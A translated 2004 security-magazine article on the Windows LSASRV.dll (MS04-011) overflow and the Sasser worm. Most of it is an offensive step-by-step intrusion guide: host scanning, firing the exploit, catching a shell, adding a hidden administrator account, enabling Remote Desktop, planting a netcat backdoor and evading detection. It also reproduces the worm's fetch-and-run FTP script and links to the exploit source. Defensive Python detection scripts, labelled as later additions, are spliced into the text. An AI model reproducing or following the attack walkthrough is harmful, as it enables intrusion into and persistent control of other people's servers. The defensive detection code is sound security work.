
The LSASRV.dll Hole and How Windows Servers Are Penetrated

Black_Devils B0ys Digital Network Security Group

A description of the vulnerability known as


Lsasrv.dll RPC buffer overflow remote exploit
Microsoft IIS Servers

Authors: Mohsen Mohammadi and C0llect0r

Edited by: Amir Hossein Sharifi

Date: 27 Tir 1383

Sources: Microsoft, eEye, Security Focus

www.WebSecurityMgz.com

Notes:
It should be noted that everything said in this article is purely educational. Any non-educational use of this material is the responsibility of the users themselves, and neither the authors of this article nor the management of the Web Security site accept any responsibility for it.


Introduction:
This is not a science-fiction story.

I think it was the morning of a day in mid-May. As on other days, I was finishing my daily report as network security manager. I even remember the time of the incident well: 10:15.

To keep the servers up we had to take some of them off the network manually at the switch. I myself noticed the incident when, on the very system where I was finishing my daily report, a message appeared saying the system would shut down within 60 seconds and that I should save my data immediately. Although I still did not know what had happened, and so that at least the effort I had put into that long three-page report would not be wasted, instead of panicking I told myself: whatever the cause of this message, it looks like a shutdown issued from the command line, and that can be cancelled with another command. So I went to Run and, with the command shutdown /a, temporarily prevented the system from shutting down.

But I knew this was not a real solution, that the problem was bigger than this, and that there had to be another cause behind it. The matter became clearer and more serious for me when the support department called to tell me that most of the users on our network had the same problem and did not know what to do. I should add that at that point I did not know what was causing these issues either. Also, because several servers had been taken down, the load on the other servers had gone up and the network had become very slow. At first I thought we were facing a Distributed Denial of Service (DDoS) attack; later I found out that all the trouble was due to a new worm.

Yes, friends, you guessed right: the Sasser worm. You too have surely wrestled with this 15-kilobyte friend. My friends and I do not intend to describe in this article the full structure and working of the variants of this Internet worm; I will only refer to it briefly. In those days it was announced that this worm uses a vulnerability in the Lsass.exe process to break into and spread across the network. When I heard this news of a hole in that component, I remembered a security advisory from the specialists of the eEye security group.

They had announced that this vulnerability lies in lsasrv.dll, which is used by lsass.exe, and that by overflowing a buffer in it one can compromise the security of the system. In this case too, soon after the eEye advisory Microsoft released patches for that hole. With this in mind I concluded that these young German hackers (the NetSky group) had surely used this very new hole to spread the Sasser worm, but the story did not end there. With the experience of these years I told myself that behind every worm there is a hole, and behind every hole there is also an exploit for hacking. Since hackers make the most of every new hole, and since this worm was still less than a year old, with only 3-4 months having passed since the event, this vulnerability would surely be the way into networks in the coming months.

Out of curiosity, some friends and I looked into a new way of hacking Microsoft IIS servers that has become known as the lsass hole. Systems not patched with Microsoft KB835732, covered in Microsoft's bulletin MS04-011, including Windows NT, Windows XP (SP0-SP1), Windows 2000 (SP1-SP4) and Windows Server 2003 in the 32- and 64-bit editions, can be penetrated through this vulnerability. By installing the patches released for this hole, or by upgrading the operating system's service pack to Service Pack 2, you can prevent any attack on your systems through this hole.

First I want to familiarize you a little with how this worm works, so that you can easily understand how the exploit works. As you may already know, after breaking into your system this worm displays a message saying the system will shut down within 60 seconds.

This worm is often confused with the well-known MS Blaster and Lovesan worms, but the difference is easy to tell from this very message. Interestingly, variants of this worm have been identified whose source code differs little from Sasser but which differ from it in appearance, and also in how they spread and behave inside the system. For example, one worm was written by someone using the alias cyclone, who also claimed to be an Iranian and a member of the community of Iranian hacker-programmers that holds a political position in Iran. This worm enters the system through port TCP45 and, if the system is vulnerable, downloads a copy of itself named CYCLONE.EXE into the system's root directory. The worm can only attack when the TFTP.EXE utility is installed on the target; it then begins its attack and crashes the Lsass.exe process, through which the security policy of the accounts is controlled. Lsass.exe also works like the Svchost.exe process: if its operation is disrupted, the system restarts. You can get the removal procedure for this worm from the following address:
http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx

Removal of this worm is only possible in safe mode, and removing this new worm takes a little work, because it disables system commands such as msconfig, knocks out firewalls and stops antivirus products such as Norton from working, which makes its removal hard. Like the specialists of the Security Focus security team, I believe the only way to get rid of this worm is to reinstall Windows and patch the relevant holes. Moreover, no antivirus is able to remove these new worms. If you have not yet been infected by them, do not waste time: close this vulnerability in lsasrv.dll and the lsass.exe process and protect yourself from the danger of these worms.

The information you have just read concerns the next generation (NG) of the Sasser worm, which is far more advanced than Worm.Win32.Sasser.A and .B. The early variants registered themselves in this registry key:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "avserve2.exe" = "%WINDIR%\avserve2.exe"

and, using the general form of the commands below, identified the IPs of other targets and began spreading across the network. Using an FTP server on port TCP/5554, the worm checks the IPs it has gathered through the Windows API to find out whether they are online and, if any of them is vulnerable, connects to that system through ports TCP/5554 and TCP/9994 and propagates itself.


echo off
echo open [attacking machine address] 5554>>cmd.ftp
echo anonymous>>cmd.ftp
echo user
echo bin>>cmd.ftp
echo get [random number]_up.exe>>cmd.ftp
echo bye>>cmd.ftp
echo on
ftp -s:cmd.ftp
[random number]_up.exe
echo off
del cmd.ftp
echo on

It should be explained that the early Sasser variants were unable to attack these IP ranges:

• 127.0.0.1

• 10.x.x.x

• 172.16.x.x - 172.31.x.x (inclusive)

• 192.168.x.x

• 169.254.x.x

It is still not known why: technical problems, or a decision by the worm's authors to skip these IPs! In any case, the Sasser NG variants described above attack every vulnerable IP.
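As an added example (not part of the original article, and not the worm's or the exploit's code), the following Python script shows how a defender can spot the propagation pattern described above in firewall or flow logs: one host opening TCP/445 to many distinct addresses, and other hosts connecting to it on the article's ports 5554 and 9994, which means it is already serving the worm binary. The log format, the addresses and the `fanout_threshold` are constructed for the demonstration; the private-range list is the one the article gives for the early variants, so the output also says whether a scanner hits those ranges (classic Sasser skipped them, the NG variants do not).

```python
"""Spot Sasser-style propagation in connection logs.  Added example; the
log lines and their format are constructed for the demonstration."""
import ipaddress
from collections import defaultdict

# Ranges the early Sasser variants did not attack, as listed in the article.
EARLY_SASSER_SKIPPED = [
    ipaddress.ip_network("127.0.0.1/32"),
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),    # 172.16.x.x - 172.31.x.x inclusive
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("169.254.0.0/16"),
]

ATTACK_PORT = 445                  # LSASS is reached over SMB, where the overflow is triggered
WORM_SERVICE_PORTS = {5554, 9994}  # the article's ports for the worm's FTP server and shell

# Constructed sample log.  Hypothetical format: "<time> <src> -> <dst>:<dport> <tcp-flag>".
SAMPLE_LOG = """\
10:15:01 192.168.1.20 -> 192.168.1.1:445 SYN
10:15:01 192.168.1.20 -> 192.168.1.2:445 SYN
10:15:01 192.168.1.20 -> 192.168.1.3:445 SYN
10:15:02 192.168.1.20 -> 192.168.1.4:445 SYN
10:15:02 192.168.1.20 -> 10.0.0.7:445 SYN
10:15:02 192.168.1.20 -> 217.218.13.173:445 SYN
10:15:03 192.168.1.5 -> 192.168.1.10:445 SYN
10:15:04 192.168.1.5 -> 192.168.1.10:445 ACK
10:15:09 192.168.1.3 -> 192.168.1.20:5554 SYN
"""


def parse_line(line):
    """Split one log line into (time, src, dst, dport, flag)."""
    time, src, arrow, dst_port, flag = line.split()
    if arrow != "->":
        raise ValueError(f"unexpected log line: {line!r}")
    dst, port = dst_port.rsplit(":", 1)
    return time, src, dst, int(port), flag


def in_early_skip_list(ip):
    """True if `ip` lies in a range the early Sasser variants skipped."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in EARLY_SASSER_SKIPPED)


def analyse(log_text, fanout_threshold=5):
    """Return {host: finding} for hosts that look like Sasser spreaders.

    A host is reported when it opens TCP/445 to at least `fanout_threshold`
    distinct addresses, or when other hosts connect to it on the worm's
    service ports (it is then already serving the worm binary)."""
    probed_445 = defaultdict(set)    # src  -> distinct hosts it probed on 445
    served_ports = defaultdict(set)  # host -> worm service ports others connected to
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _, src, dst, port, flag = parse_line(line)
        if flag != "SYN":
            continue                 # count each connection attempt once
        if port == ATTACK_PORT:
            probed_445[src].add(dst)
        elif port in WORM_SERVICE_PORTS:
            served_ports[dst].add(port)

    findings = {}
    for host in set(probed_445) | set(served_ports):
        targets = probed_445.get(host, set())
        ports = sorted(served_ports.get(host, set()))
        if len(targets) >= fanout_threshold or ports:
            findings[host] = {
                "fanout_445": len(targets),
                "serves_worm_ports": ports,
                "targets_private_ranges": any(in_early_skip_list(t) for t in targets),
            }
    return findings


if __name__ == "__main__":
    for host, finding in analyse(SAMPLE_LOG).items():
        print(host, finding)
```

On the constructed log, 192.168.1.20 is reported with a 445 fan-out of six, a connection received on 5554, and private-range targets (so it behaves like an NG variant), while 192.168.1.5, which only talks to one file server, is not. The threshold is a tuning knob: a legitimate file-server client rarely opens 445 to more than a handful of distinct hosts in a few seconds.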

It is worth mentioning that Sasser was written in versions A through Z; after the arrest of the worm's author, other people began releasing further variants. Although the later worms used the same hole to break in and had a code genome similar above all to Worm.Win32.Sasser.B, in reach, other capabilities and stealth they differed markedly from their forefathers.
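The Run-key entry quoted above for Sasser.A/B is the kind of persistence an incident responder checks first when a machine shows the 60-second shutdown message. As an added example (not the article's own code), this Python script triages a text export of the Run key: it flags the image name the article gives, an entry registered under its own executable name, and executables dropped directly in the Windows directory root. The export text is constructed, its benign entries are made up, and the two heuristics beside the known name are assumptions for illustration, not a complete signature for the later variants.

```python
"""Triage the HKLM\\...\\CurrentVersion\\Run key for worm persistence.
Added example; the registry export text below is constructed."""
import re

RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
KNOWN_WORM_IMAGES = {"avserve2.exe"}    # the image the article quotes for Sasser.A/B
# Directories where a dropped worm binary typically lands (heuristic, an assumption).
WINDIR_ROOTS = ("%windir%\\", "%systemroot%\\", "c:\\windows\\", "c:\\winnt\\")

# Constructed "reg export" excerpt: the avserve2.exe line follows the article,
# the other two entries are made-up benign noise.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Synchronization Manager"="mobsync.exe /logon"
"avserve2.exe"="%WINDIR%\\avserve2.exe"
"Backup Agent"="C:\\Program Files\\Backup\\agent.exe"
'''


def parse_run_entries(reg_text):
    """Return {value_name: command} for the Run key in a reg-export text."""
    entries, current_key = {}, None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current_key = line[1:-1]
            continue
        if current_key != RUN_KEY or not line:
            continue
        m = re.match(r'^"([^"]+)"="(.*)"$', line)
        if m:
            # reg export doubles backslashes inside string values; undo that.
            entries[m.group(1)] = m.group(2).replace("\\\\", "\\")
    return entries


def image_name(command):
    """Lower-cased file name of the executable a Run command launches."""
    cmd = command.strip().strip('"').lower()
    end = cmd.find(".exe")
    head = cmd[:end + 4] if end != -1 else cmd.split()[0]
    return head.rsplit("\\", 1)[-1]


def triage_run_key(reg_text):
    """List Run entries worth a closer look, each with the reasons it was flagged."""
    findings = []
    for name, cmd in parse_run_entries(reg_text).items():
        img = image_name(cmd)
        path = cmd.strip().strip('"').lower()
        directory = path[:path.find(img)]
        reasons = []
        if img in KNOWN_WORM_IMAGES:
            reasons.append("known Sasser image name")
        if name.lower() == img:
            reasons.append("registered under its own executable name")
        if directory in WINDIR_ROOTS:
            reasons.append("executable dropped directly in the Windows directory")
        if reasons:
            findings.append({"value": name, "image": img, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage_run_key(SAMPLE_REG_EXPORT):
        print(finding)
```

On the sample export only the avserve2.exe entry is reported, with all three reasons; the two benign entries launch from a proper program directory or under a descriptive value name and stay quiet. The same parser can be pointed at the HKCU Run key by changing RUN_KEY.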


The article below is a step-by-step description of how the unpatched systems listed above are penetrated. Because this hole is new, and because network administrators are perennially slow to update their systems, the number of attacks through this hole is likely to be very high. For this reason we decided to point out the danger of this kind of attack by introducing this hole, how it works, and how to identify it on vulnerable servers. Therefore the material in this article is purely educational; any misuse of the material below is the responsibility of the users themselves, and the authors of this article and the management of the Web Security site accept no responsibility in this regard.


Required software:

1: Nmap (current version is 3.50 as of this writing)
http://www.insecure.org

2: nc11nt
http://www.atstake.com

3: GFI LANguard Security Scanner or DSScan (version 2004)
http://www.foundstone.com

4: HOD-ms04011-lsasrv-expl.c (compile this source)

5: Terminal Server & Client or WinVNC3
http://www.download.com

Note: all the operations were carried out on hypothetical systems and were prepared to demonstrate the procedure; the IPs belong to a private LAN.

First determine your own IP on the network with the ipconfig command, then use nmap with the -sP switch to find the systems that are up (to keep this article short, you can refer for this part to the article "The RPC hole and penetrating IIS servers" on the Web Security site). After finding the systems of interest, you must check them for the bug in question.

If you have only a single target in mind you can skip this step; testing the exploit directly on it will tell you whether the hole exists on the system. But if you intend to check an IP range for vulnerable systems, testing each one with the exploit can be tedious. For this purpose you can use GFI LANguard Security Scanner v5. It is a very powerful scanner that not only checks for this particular hole in the shortest time but also finds every hole known to date, and you will certainly identify many other holes as well. Working with this scanner, however, requires some prior familiarity with how to configure it; if it is not configured well, the results can leave you confused. Filtering the final scan report is also not very easy. It is one of the favorite scanners of professional hackers, and I myself prefer it over the other scanners :)

(The GFI LANguard Security Scanner v5 scanner)

So I recommend the tool that Foundstone has produced for this specific purpose; working with this scanner is far, far simpler than GFI, though for professionals I still recommend GFI (do pay attention to this recommendation).

DSScan is a tool built around this hole: it sends echo packets to port 445 of the systems in question and, if the hole exists, determines from the returned packets that the system is vulnerable.


See the figure below (the DSScan tool from Foundstone).

To start with this scanner, first specify the scan range in the Start IP and End IP fields, then click the arrow next to them to select the range and start the scan.

The results appear quickly. In the Status column you can see the vulnerable and non-vulnerable systems; by entering a single IP or host name in the field at the top of this section you can also test just one target for this bug.


Note: the IPs shown in the figures below belong to an internal network; they were tested purely for educational purposes inside a virtual network and are of no use outside that network.

1: In the figure below I scan the IP range 217.218.13.1-217.218.13.254; the results are displayed quickly. You can see that 217.218.13.173 is a system vulnerable to this hole, and I intend to work on this target (see the figure below). In the Status column the vulnerable systems are marked Vulnerable.

(Scanning with DSScan)

2: At this stage we fire the exploit at the target server (you can compile the source of this exploit with lcc-win32).


Note: to save my fingers from the long name HOD-ms04011-lsasrv-expl.exe, I renamed this exploit to lss.exe; I suggest you do the same before running the exploit.

(Running the exploit against the target system)

After the exploit has connected to the target successfully and you see the message Attacking ... OK, you must get access to the shell in one of the two following ways:

a: Before running the exploit, use Netcat to put port 5000 of your own system into listening mode. This is the port you chose as BindPort when running the exploit (see the figure above).

You can use other ports too, but bear in mind that if you choose well-known ports such as 80 or 23, or ports that by standard serve a set of protocols, this may interfere with the running of the exploit and make it fail, so it is better to use unusual ports such as 44444 or 6669, or any other port you like.

In the figure below you can see that port 5000 has been put into listening mode; when the exploit's response comes back, the shell on your system uses this port to communicate with the target system.

(Putting your own system into listening mode on port 5000)

b: The second way, which I myself recommend, is to use Telnet, because in this particular case Telnet is faster than Netcat. From the standpoint of a secure connection, however, Netcat offers the VVV (very very verbose) mode. The choice between the two is up to you.

3: In the figure below I took the shell via Telnet and, with the ipconfig command, confirmed that I now have the IP 217.218.13.173; in effect I have become a user of this system with administrator rights. I suggest you send an email to the administrator of the server in question to inform them of this bug.


(Getting a shell via Telnet)

4: From here on the system is in your hands, and practically speaking you can now do anything, but ethically there are limits. Here you could transfer files to the target via TFTP, sniff data, or do anything else on the server. In what follows, purely to familiarize readers, I will show just one of the things you can do on the target system: creating a new user on it, so that next time you will not need to run the exploit again to get into the server. You can also create a backdoor on the target with netcat. I repeat: at this stage of the intrusion everything depends on you, and it is you who decides how to extend your intrusion on the target. In the figure below you can see the system's accounts with the net user command. You could change the password of one of these accounts, but I do not change the password of the main user, which here is Administrator. If you find a username that has not been used for a long time, it is suitable for making changes.


(Listing the accounts present on the target)

But I intend to create a user with administrator access named sysbackup (see the figure below). Again, if there is a user that has not been used for a while, you can work on that one instead.

(Adding a new account named sysbackup)

Running the net user command again, you see that sysbackup has been added to the system's users.

(Viewing the accounts again)


To see details about the user we created, we use the command net user sysbackup. Look at the Local Group Memberships section: you will notice this user is not yet an administrator!

(Viewing more details about the created account)

With the command you see in the figure below, I make sysbackup an administrator.

(Turning the new account into an Administrator)


I query the properties of sysbackup again; look at the Local Group Memberships line and you see that sysbackup is now an administrator.

(Viewing the new user's details again)

I also set a password on this user to prevent any misuse: 12345

(Setting a password on the account)

With the net start command, look at the services running on the system. If you see the Terminal Services service, you can later use Remote Desktop Connection or other programs such as Terminal Server & Client; get the program from Download.com.

(Listing the services currently running on the target system, in particular Terminal Services)

If for any reason the Terminal Services service is not started, you can start it as administrator so that next time you can connect to the server via Remote Desktop Connection (to start services, refer to the subcommands of the net command). You can also use other programs such as Terminal Server & Client and WinVNC32 to connect to the server, but here, for readers' convenience, I use one of Windows' own built-in programs.

In the figure below we use the user name and password whose creation you saw in the steps above. This is not the only way back into a hacked system; I used it as the example because it is user-friendly. As I said above, by creating a backdoor on the system you can also get back into the same system without running the exploit again.

(Connecting via Remote Desktop Connection)

And this is what you were hoping to get. I am sure you will not do any damage and, like all white-hat hackers, at this stage will inform the administrator of that site about this particular bug and show them how to patch the vulnerability.

(Logging into the target system through the GUI)
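Steps 3 and 4 above (a shell obtained from the LSASS process, a new account, its promotion to Administrators, a password set on it, and Terminal Services started) each leave a record in the Windows event logs, which is where an administrator who did not get the courtesy email would find them. As an added example written from the defender's side (not code from the article), the following Python script correlates such records: an account created and added to Administrators within a short window, with the password-set event and the Terminal Services start alongside. The event records are constructed dictionaries standing in for parsed log entries; the event IDs 624/636/628 (Windows 2000/XP/2003) and 4720/4732/4724 (Vista and later) for account created, local-group member added and password set, and 7036 (Service Control Manager, service entered the running state) are real, while the window length and the field names are assumptions.

```python
"""Correlate Windows event-log records left by the post-exploitation steps
in the article.  Added example; the event records below are constructed."""
from datetime import datetime, timedelta

# Security-log event IDs: Windows 2000/XP/2003 used 624/636/628, Vista and later
# use 4720/4732/4724 (account created, member added to local group, password set).
LEGACY_TO_MODERN = {624: 4720, 636: 4732, 628: 4724}
ACCOUNT_CREATED, GROUP_MEMBER_ADDED, PASSWORD_SET = 4720, 4732, 4724
SERVICE_RUNNING = 7036          # System log, Service Control Manager: service entered running state
ADMIN_GROUPS = {"administrators"}

# Constructed records; the field names are an assumption, not a Windows export format.
SAMPLE_EVENTS = [
    {"time": "2004-07-17 09:00:00", "id": 624, "subject": "LAB\\itadmin", "target": "j.smith"},
    {"time": "2004-07-17 10:20:05", "id": 624, "subject": "SYSTEM", "target": "sysbackup"},
    {"time": "2004-07-17 10:21:40", "id": 636, "subject": "SYSTEM", "target": "sysbackup",
     "group": "Administrators"},
    {"time": "2004-07-17 10:22:10", "id": 628, "subject": "SYSTEM", "target": "sysbackup"},
    {"time": "2004-07-17 10:23:00", "id": 7036, "service": "Terminal Services", "state": "running"},
]


def normalize(event):
    """Map legacy IDs to their modern equivalents and parse the timestamp."""
    e = dict(event)
    e["id"] = LEGACY_TO_MODERN.get(e["id"], e["id"])
    e["ts"] = datetime.strptime(e["time"], "%Y-%m-%d %H:%M:%S")
    return e


def correlate_new_admins(events, window_minutes=30):
    """Return {account: finding} for accounts created and then added to an
    administrators group within `window_minutes`."""
    window = timedelta(minutes=window_minutes)
    created, findings = {}, {}
    for e in sorted((normalize(ev) for ev in events), key=lambda ev: ev["ts"]):
        if e["id"] == ACCOUNT_CREATED:
            created[e["target"].lower()] = e
        elif e["id"] == GROUP_MEMBER_ADDED and e.get("group", "").lower() in ADMIN_GROUPS:
            name = e["target"].lower()
            c = created.get(name)
            if c is not None and e["ts"] - c["ts"] <= window:
                notes = []
                if c["subject"].upper() == "SYSTEM":
                    # A shell spawned from a service such as LSASS acts as SYSTEM,
                    # which is not how an administrator normally creates accounts.
                    notes.append("created by the SYSTEM identity")
                findings[name] = {"created_at": c["time"], "made_admin_at": e["time"],
                                  "created_by": c["subject"], "password_set": False,
                                  "notes": notes}
        elif e["id"] == PASSWORD_SET and e["target"].lower() in findings:
            findings[e["target"].lower()]["password_set"] = True
    return findings


def service_started(events, service_name):
    """True if the System log shows `service_name` entering the running state."""
    return any(e["id"] == SERVICE_RUNNING
               and e.get("service", "").lower() == service_name.lower()
               and e.get("state") == "running" for e in events)


if __name__ == "__main__":
    for account, finding in correlate_new_admins(SAMPLE_EVENTS).items():
        print(account, finding)
    print("Terminal Services started:", service_started(SAMPLE_EVENTS, "Terminal Services"))
```

On the constructed records, sysbackup is reported (created and promoted 95 seconds apart, by the SYSTEM identity, with a password set) while j.smith, created earlier by an administrator and never promoted, is not. Pairing this with a Terminal Services start on a server where that service was previously stopped is a strong reason to look at who is about to log in over RDP.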

Important note:

It is also possible that even with the user name and password you cannot connect to the target system, because the server must be restarted for your newly created account to be taken up by the system's security process so that it can be used next time. For this, use the Windows Remote Shutdown Dialog, then use Remote Desktop Connection again to connect.


With the Remote Shutdown Dialog program built into Microsoft 2000/XP/2003 Server, given system permission you will be able to shut down, log off and restart any system remotely. You must, of course, accept the risk of your intrusion being exposed. In any case, if even at this stage, after restarting the target system, you still cannot log in to it, it is likely that your attack has been detected and your new account disabled or deleted.... Try to get in again through the same exploit, but this time more carefully. Although breaking into a system cannot be an easy job, extending the intrusion and staying hidden are more complex still; the real art of hacking crystallizes in this very point.....

Final word: what matters is not how you break into your target but how you extend your intrusion and what goals you pursue with it. We ask you to use this article to secure your own servers, to warn others, and, if you discover such a bug in your system, to install the patches mentioned. Below we provide the source of this exploit for users who are proficient in C programming.

If you run into any problem, please contact the authors of this article; all mail sent will be answered as soon as possible.
Mohsen2_ir@yahoo.com
Liv4devil@yahoo.com
C0llect0r@Spymac.com

You can download the exploit file from the following address:

http://www.websecuritymgz.com/articles/lss.c
